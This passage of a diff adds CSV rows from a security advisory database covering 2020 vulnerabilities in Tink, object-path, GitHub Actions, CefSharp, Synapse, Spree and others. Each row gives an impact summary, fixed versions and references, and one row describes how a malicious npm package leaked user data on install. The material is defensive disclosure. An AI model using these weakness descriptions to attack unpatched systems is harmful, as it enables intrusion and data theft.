+Tink uses the first five bytes of a ciphertext for a version byte and a four byte key ID. Since each key has a well defined prefix, this extends non-malleability properties (but technically not indistinguishability). However, in the Java version this prefix lookup used a hash map indexed by unicode strings instead of the byte array, which means that invalid Unicode characters would be [replaced by U+FFFD](https://en.wikipedia.org/wiki/UTF-8#Invalid_sequences_and_error_handling) by the [Java API's default behavior](https://docs.oracle.com/javase/7/docs/api/java/lang/String.html#String(byte[],%20java.nio.charset.Charset)). This means several different values for the five bytes would result in the same hash table key, which allows an attacker to exchange one invalid byte sequence for another, creating a mutated ciphertext that still decrypts (to the same plaintext).
+
+### Acknowledgements
+We'd like to thank Peter Esbensen for finding this issue and raising it internally.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Tink](https://github.com/google/tink/issues)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.google.crypto.tink:tink'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/google/tink/security/advisories/GHSA-g5vf-v6wf-7w2r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8929'}, {'type': 'WEB', 'url': 'https://github.com/google/tink/commit/93d839a5865b9d950dffdc9d0bc99b71280a8899'}]","{'cwe_ids': ['CWE-176', 'CWE-327'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-10-16T00:49:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cwx2-736x-mf6w,2021-11-19T14:05:56Z,2020-10-19T20:55:55Z,,['CVE-2020-15256'],Prototype pollution in object-path,"### Impact
+A prototype pollution vulnerability has been found in `object-path` <= 0.11.4 affecting the `set()` method. The vulnerability is limited to the `includeInheritedProps` mode (if version >= 0.11.0 is used), which has to be explicitly enabled by creating a new instance of `object-path` and setting the option `includeInheritedProps: true`, or by using the default `withInheritedProps` instance. The default operating mode is not affected by the vulnerability if version >= 0.11.0 is used. Any usage of `set()` in versions < 0.11.0 is vulnerable.
+
+### Patches
+Upgrade to version >= 0.11.5
+
+### Workarounds
+Don't use the `includeInheritedProps: true` options or the `withInheritedProps` instance if using a version >= 0.11.0.
+
+### References
+[Read more about the prototype pollution vulnerability](https://codeburst.io/what-is-prototype-pollution-49482fc4b638)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [object-path](https://github.com/mariocasciaro/object-path)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'object-path'}, 'ecosystem_specific': {'affected_functions': ['object-path.set']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.11.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mariocasciaro/object-path/security/advisories/GHSA-cwx2-736x-mf6w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15256'}, {'type': 'WEB', 'url': 'https://github.com/mariocasciaro/object-path/commit/2be3354c6c46215c7635eb1b76d80f1319403c68'}, {'type': 'PACKAGE', 'url': 'https://github.com/mariocasciaro/object-path'}]","{'cwe_ids': ['CWE-20', 'CWE-471'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-19T20:52:39Z', 'nvd_published_at': '2020-10-19T22:15:00Z'}"
+1.4.0,GHSA-mfwh-5m23-j46w,2021-11-19T15:11:59Z,2020-10-01T17:16:20Z,,['CVE-2020-15228'],Environment Variable Injection in GitHub Actions,"### Impact
+The `@actions/core` npm module `addPath` and `exportVariable` functions communicate with the Actions Runner over stdout by generating a string in a specific format. Workflows that log untrusted data to stdout may invoke these commands, resulting in the path or environment variables being modified without the intention of the workflow or action author.
+
+### Patches
+The runner will release an update that disables the `set-env` and `add-path` workflow commands in the near future. For now, users should upgrade to `@actions/core v1.2.6` or later, and replace any instance of the `set-env` or `add-path` commands in their workflows with the new [Environment File Syntax](https://github.com/actions/toolkit/blob/main/docs/commands.md#environment-files). Workflows and actions using the old commands or older versions of the toolkit will start to warn, then error out during workflow execution.
+
+### Workarounds
+None, it is strongly suggested that you upgrade as soon as possible.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Actions Toolkit](https://github.com/actions/toolkit/issues)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@actions/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/actions/toolkit/security/advisories/GHSA-mfwh-5m23-j46w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15228'}, {'type': 'PACKAGE', 'url': 'https://github.com/actions/toolkit/'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/159794/GitHub-Widespread-Injection.html'}]","{'cwe_ids': ['CWE-20', 'CWE-77'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-10-01T17:16:10Z', 'nvd_published_at': '2020-10-01T18:15:00Z'}"
+1.4.0,GHSA-pv36-h7jh-qm62,2022-01-31T22:01:40Z,2020-10-27T19:47:38Z,,['CVE-2020-15999'],Heap buffer overflow in CefSharp,"### Impact
+A memory corruption bug(Heap overflow) in the FreeType font rendering library.
+
+> This can be exploited by attackers to execute arbitrary code by using specially crafted fonts with embedded PNG images .
+
+As per https://www.secpod.com/blog/chrome-zero-day-under-active-exploitation-patch-now/
+
+Google is aware of reports that an exploit for CVE-2020-15999 exists in the wild.
+
+### Patches
+Upgrade to 85.3.130 or higher
+
+### References
+- https://www.secpod.com/blog/chrome-zero-day-under-active-exploitation-patch-now/
+- https://www.zdnet.com/article/google-releases-chrome-security-update-to-patch-actively-exploited-zero-day/
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15999
+- https://magpcss.org/ceforum/viewtopic.php?f=10&t=17942
+
+To review the `CEF/Chromium` patch see https://bitbucket.org/chromiumembedded/cef/commits/cd6cbe008b127990036945fb75e7c2c1594ab10d","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'CefSharp.Common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '85.3.130'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'CefSharp.Wpf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '85.3.130'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'CefSharp.WinForms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '85.3.130'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'CefSharp.Wpf.HwndHost'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '85.3.130'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cefsharp/CefSharp/security/advisories/GHSA-pv36-h7jh-qm62'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15999'}, {'type': 'WEB', 'url': 'https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html'}, {'type': 'WEB', 'url': 'https://crbug.com/1139963'}, {'type': 'PACKAGE', 'url': 'https://github.com/cefsharp/CefSharp'}, {'type': 'WEB', 'url': 'https://googleprojectzero.blogspot.com/p/rca-cve-2020-15999.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J3QVIGAAJ4D62YEJAJJWMCCBCOQ6TVL7/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202011-12'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202012-04'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4824'}, {'type': 'WEB', 'url': 'https://www.nuget.org/packages/CefSharp.Common/'}, {'type': 'WEB', 'url': 'https://www.nuget.org/packages/CefSharp.WinForms'}, {'type': 'WEB', 'url': 'https://www.nuget.org/packages/CefSharp.Wpf'}, {'type': 'WEB', 'url': 'https://www.nuget.org/packages/CefSharp.Wpf.HwndHost'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00016.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2020/Nov/33'}]","{'cwe_ids': ['CWE-119', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-27T19:47:22Z', 'nvd_published_at': '2020-11-03T03:15:00Z'}"
+1.4.0,GHSA-4p55-xj37-fx7g,2023-09-13T19:30:47Z,2020-10-29T18:29:31Z,,['CVE-2020-27665'],Improper Authorization in Strapi,"In Strapi before 3.2.5, there is no `admin::hasPermissions` restriction for CTB (aka content-type-builder) routes.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'strapi-plugin-content-type-builder'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27665'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/pull/8439'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/commit/3cdd73987950d5c7976701047b38203e902007bb'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/releases/tag/v3.2.5'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-STRAPIPLUGINCONTENTTYPEBUILDER-1021616'}]","{'cwe_ids': ['CWE-276'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-29T16:25:47Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xpmx-h7xq-xffh,2021-11-19T15:30:46Z,2020-10-02T16:33:41Z,,['CVE-2020-15170'],Potential access control security issue in apollo-adminservice,"### Impact
+If users expose apollo-adminservice to internet(which is not recommended), there are potential security issues since apollo-adminservice is designed to work in intranet and it doesn't have built-in access control. Malicious hackers may access apollo-adminservice apis directly to access/edit the application's configurations.
+
+### Patches
+Access control for admin service was added in #3233 and was released in [v1.7.1](https://github.com/ctripcorp/apollo/releases/tag/v1.7.1).
+
+### Workarounds
+To fix the potential issue without upgrading, simply follow the advice that do not expose apollo-adminservice to internet.
+
+### Credits
+[Lexu](https://github.com/lllllx) reported the issue and provided the required information to reproduce it.
+
+### References
+[Apollo Security Guidence](https://github.com/ctripcorp/apollo/wiki/Apollo%E4%BD%BF%E7%94%A8%E6%8C%87%E5%8D%97#71-%E5%AE%89%E5%85%A8%E7%9B%B8%E5%85%B3)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an [issue](https://github.com/ctripcorp/apollo/issues)
+* Email to one of the active [project maintainers](https://github.com/ctripcorp/apollo/graphs/contributors)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.ctrip.framework.apollo:apollo-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ctripcorp/apollo/security/advisories/GHSA-xpmx-h7xq-xffh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15170'}, {'type': 'WEB', 'url': 'https://github.com/ctripcorp/apollo/pull/3233/commits/ae9ba6cfd32ed80469f162e5e3583e2477862ddf'}, {'type': 'PACKAGE', 'url': 'https://github.com/ctripcorp/apollo'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-02T16:32:24Z', 'nvd_published_at': '2020-09-10T19:15:00Z'}"
+1.4.0,GHSA-6r7x-hc8m-985r,2022-01-04T19:44:56Z,2020-10-13T17:29:25Z,,['CVE-2020-9038'],Cross-site Scripting in Joplin,Joplin through 1.0.184 allows Arbitrary File Read via Cross-site Scripting (XSS).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'joplin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-9038'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/commit/3db47b575b9cb0a765da3d283baa2c065df0d0bc'}, {'type': 'PACKAGE', 'url': 'https://github.com/laurent22/joplin'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/compare/clipper-1.0.19...clipper-1.0.20'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/156582/Joplin-Desktop-1.0.184-Cross-Site-Scripting.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-02T16:40:35Z', 'nvd_published_at': '2020-02-17T16:15:00Z'}"
+1.4.0,GHSA-xgh6-85xh-479p,2020-10-16T18:56:02Z,2020-10-16T18:56:26Z,,[],Regular Expression Denial of Service in npm-user-validate,"`npm-user-validate` before version `1.0.1` is vulnerable to a Regular Expression Denial of Service (REDos). The regex that validates user emails took exponentially longer to process long input strings beginning with `@` characters.
+
+### Impact
+The issue affects the `email` function. If you use this function to process arbitrary user input with no character limit the application may be susceptible to Denial of Service.
+
+### Patches
+The issue is patched in version 1.0.1 by improving the regular expression used and also enforcing a 254 character limit.
+
+### Workarounds
+Restrict the character length to a reasonable degree before passing a value to `.emal()`; Also, consider doing a more rigorous sanitizing/validation beforehand.",[],"[{'package': {'ecosystem': 'npm', 'name': 'npm-user-validate'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-10-16T18:56:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h385-52j6-9984,2021-01-13T19:25:43Z,2020-10-20T19:15:38Z,2021-01-13T19:25:43Z,['CVE-2020-7670'],Withdrawn: HTTP Request Smuggling in Agoo,"# Withdrawn reason
+Withdrawn on 1/13/2021 due to [this comment from the maintainer](https://github.com/ohler55/agoo/issues/88#issuecomment-723580783). This is no longer considered a vulnerability.
+
+# Original description
+agoo through 2.12.3 allows request smuggling attacks where agoo is used as a backend and a frontend proxy also being vulnerable. It is possible to conduct HTTP request smuggling attacks by sending the Content-Length header twice. Furthermore, invalid Transfer Encoding headers were found to be parsed as valid which could be leveraged for TE:CL smuggling attacks.",[],"[{'package': {'ecosystem': 'RubyGems', 'name': 'agoo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.13.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7670'}, {'type': 'WEB', 'url': 'https://github.com/ohler55/agoo/issues/88'}, {'type': 'WEB', 'url': 'https://github.com/ohler55/agoo/commit/23d03535cf7b50d679a60a953a0cae9519a4a130'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-RUBY-AGOO-569137'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-20T19:04:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-939m-4xpw-v34v,2020-10-26T20:14:25Z,2020-10-27T17:55:04Z,,['CVE-2020-26943'],Arbitrary Code Execution in blazar-dashboard,"An issue was discovered in OpenStack blazar-dashboard before 1.3.1, 2.0.0, and 3.0.0. A user allowed to access the Blazar dashboard in Horizon may trigger code execution on the Horizon host as the user the Horizon service runs under (because the Python eval function is used). This may result in Horizon host unauthorized access and further compromise of the Horizon service. All setups using the Horizon dashboard with the blazar-dashboard plugin are affected.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'blazar-dashboard'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'blazar-dashboard'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.1'}]}], 'versions': ['2.0.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'blazar-dashboard'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.1'}]}], 'versions': ['3.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26943'}, {'type': 'WEB', 'url': 'https://launchpad.net/bugs/1895688'}, {'type': 'WEB', 'url': 'https://review.opendev.org/755810'}, {'type': 'WEB', 'url': 'https://review.opendev.org/755812'}, {'type': 'WEB', 'url': 'https://review.opendev.org/755813'}, {'type': 'WEB', 'url': 'https://review.opendev.org/755814'}, {'type': 'WEB', 'url': 'https://review.opendev.org/756064'}, {'type': 'WEB', 'url': 'https://security.openstack.org/ossa/OSSA-2020-007.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/10/16/5'}]","{'cwe_ids': ['CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-26T20:14:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vr9x-mm65-2438,2020-10-19T18:55:38Z,2020-10-08T21:38:51Z,2020-10-19T18:55:38Z,['CVE-2020-8178'],Command Injection in jison,"**Withdrawn:** This vulnerability is not present in the released npm package. Rather the vulnerable code is
+part of the repo, but not part of the package. See linked hackerone report for more details.
+
+Insufficient input validation in npm package `jison` <= 0.4.18 may lead to OS command injection attacks.",[],"[{'package': {'ecosystem': 'npm', 'name': 'jison'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.18'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8178'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/690010'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-08T21:36:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3x8c-fmpc-5rmq,2022-11-22T17:43:33Z,2020-10-16T16:56:04Z,,['CVE-2020-26891'],Cross-site scripting (XSS) vulnerability in the fallback authentication endpoint,"### Impact
+The fallback authentication endpoint served via Synapse was vulnerable to cross-site scripting (XSS) attacks. The impact depends on the configuration of the domain that Synapse is deployed on, but may allow access to cookies and other browser data, CSRF vulnerabilities, and access to other resources served on the same domain or parent domains.
+
+### Patches
+This is fixed by #8444, which is included in Synapse v1.21.0.
+
+### Workarounds
+If the homeserver is not configured to use reCAPTCHA, consent (terms of service), or single sign-on then the affected endpoint can be blocked at a reverse proxy:
+
+* `/_matrix/client/r0/auth/.*/fallback/web`
+* `/_matrix/client/unstable/auth/.*/fallback/web`",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.21.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-3x8c-fmpc-5rmq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26891'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/8444'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.21.2'}, {'type': 'WEB', 'url': 'https://matrix.org/blog/2020/10/15/synapse-1-21-2-released-and-security-advisory'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-16T16:55:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c84h-w6cr-5v8q,2022-03-22T20:38:43Z,2020-10-27T17:59:54Z,,['CVE-2020-15271'],Markdown-supplied Shell Command Execution,"### Impact
+
+lookatme versions prior to 2.3.0 automatically loaded the built-in ""terminal"" and ""file_loader"" extensions. Users that use lookatme to render untrusted markdown may have malicious shell commands automatically run on their system.
+
+### Patches
+
+Users should upgrade to lookatme versions 2.3.0 or above.
+
+### Workarounds
+
+The `lookatme/contrib/terminal.py` and `lookatme/contrib/file_loader.py` files may be manually deleted. Additionally, it is always recommended to be aware of what is being rendered with lookatme.
+
+### References
+
+* https://github.com/d0c-s4vage/lookatme/pull/110
+* https://github.com/d0c-s4vage/lookatme/releases/tag/v2.3.0
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+* Open an issue in [d0c-s4vage/lookatme](https://github.com/d0c-s4vage/lookatme)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'lookatme'}, 'ecosystem_specific': {'affected_functions': ['lookatme.contrib.load_contribs']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/d0c-s4vage/lookatme/security/advisories/GHSA-c84h-w6cr-5v8q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15271'}, {'type': 'WEB', 'url': 'https://github.com/d0c-s4vage/lookatme/pull/110'}, {'type': 'WEB', 'url': 'https://github.com/d0c-s4vage/lookatme/commit/72fe36b784b234548d49dae60b840c37f0eb8d84'}, {'type': 'PACKAGE', 'url': 'https://github.com/d0c-s4vage/lookatme'}, {'type': 'WEB', 'url': 'https://github.com/d0c-s4vage/lookatme/releases/tag/v2.3.0'}, {'type': 'WEB', 'url': 'https://pypi.org/project/lookatme/#history'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-10-26T18:07:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mfc2-93pr-jf92,2020-10-01T17:09:29Z,2020-10-01T17:10:15Z,,[],Malicious code in `loadyaml`,"npm packages `loadyaml` and `electorn` were removed from the npm registry for containing malicious code. Upon installation the package runs a preinstall script that writes a public comment on GitHub containing the following information:
+- IP and IP-based geolocation
+- home directory name
+- local username
+
+The malicious packages have been removed from the npm registry and the leaked content removed from GitHub.",[],"[{'package': {'ecosystem': 'npm', 'name': 'loadyaml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1563'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-10-01T17:09:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8xv9-qcr9-ww9j,2021-10-04T21:28:06Z,2020-10-19T21:32:18Z,,[],Authenticated XML External Entity Processing,"### Impact
+Authenticated XML External Entity Processing
+
+### Patches
+We recommend to update to the current version 6.3.2.1. You can get the update to 6.3.2.1 regularly via the Auto-Updater or directly via the download overview.
+
+https://www.shopware.com/en/download/#shopware-6
+
+### Workarounds
+For older versions of 6.1 and 6.2 the corresponding changes are also available via plugin:
+https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659
+
+### For more information
+https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-10-2020","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.2.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.2.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.2.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.2.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-8xv9-qcr9-ww9j'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PHP-SHOPWAREPLATFORM-1019470'}]","{'cwe_ids': ['CWE-611'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-19T21:32:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f8cm-364f-q9qh,2021-11-19T13:51:14Z,2020-10-20T20:03:52Z,,['CVE-2020-15269'],Ensure that doorkeeper_token is valid when authenticating requests in API v2 calls,"### Impact
+The perpetrator who previously obtained an old expired user token could use it to access Storefront API v2 endpoints.
+
+### Patches
+Please upgrade to 3.7.11, 4.0.4, or 4.1.11 depending on your used Spree version.
+
+### Workarounds
+In your project directory create a decorator file `app/controllers/spree/api/v2/base_controller_decotatror.rb` with contents:
+
+```ruby
+module Spree
+ module Api
+ module V2
+ module BaseControllerDecorator
+ private
+
+ def spree_current_user
+ return nil unless doorkeeper_token
+ return @spree_current_user if @spree_current_user
+
+ doorkeeper_authorize!
+
+ @spree_current_user ||= ::Spree.user_class.find_by(id: doorkeeper_token.resource_owner_id)
+ end
+ end
+ end
+end
+
+Spree::Api::V2::BaseController.prepend(Spree::Api::V2::BaseControllerDecorator)
+```
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [security@spreecommerce.org](mailto:security@spreecommerce.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'spree'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.11'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'spree'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.4'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'spree'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.11'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/spree/spree/security/advisories/GHSA-f8cm-364f-q9qh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15269'}, {'type': 'WEB', 'url': 'https://github.com/spree/spree/commit/e43643abfe51f54bd9208dd02298b366e9b9a847'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2020-15269.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/spree/spree'}]","{'cwe_ids': ['CWE-287', 'CWE-613'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-20T20:03:19Z', 'nvd_published_at': '2020-10-20T21:15:00Z'}"
+1.4.0,GHSA-589w-hccm-265x,2021-01-07T22:50:45Z,2020-10-19T20:17:47Z,,['CVE-2020-15263'],Inline attribute values were not processed.,"### Impact
+Inline attributes have not been processed escape.
+If the data that came from users was not processed, then an XSS vulnerability is possible
+
+### Patches
+Fixed in 9.4.4","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'orchid/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/orchidsoftware/platform/security/advisories/GHSA-589w-hccm-265x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15263'}, {'type': 'WEB', 'url': 'https://github.com/orchidsoftware/platform/commit/03f9a113b1a70bc5075ce86a918707f0e7d82169'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-19T20:17:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hwv5-w8gm-fq9f,2021-01-07T22:52:06Z,2020-10-06T18:21:02Z,,['CVE-2020-15239'],Directory Traversal vulnerability in GET/PUT allows attackers to Disclose Information or Write Files via a crafted GET/PUT request,"### Impact
+
+#### Information Disclosure
+
+When the GET method is attacked, attackers can read files which have a `.data` suffix and which are accompanied by a JSON file with the `.meta` suffix. This can lead to Information Disclosure and in some shared-hosting scenarios also to circumvention of authentication or other limitations on the outbound (GET) traffic.
+
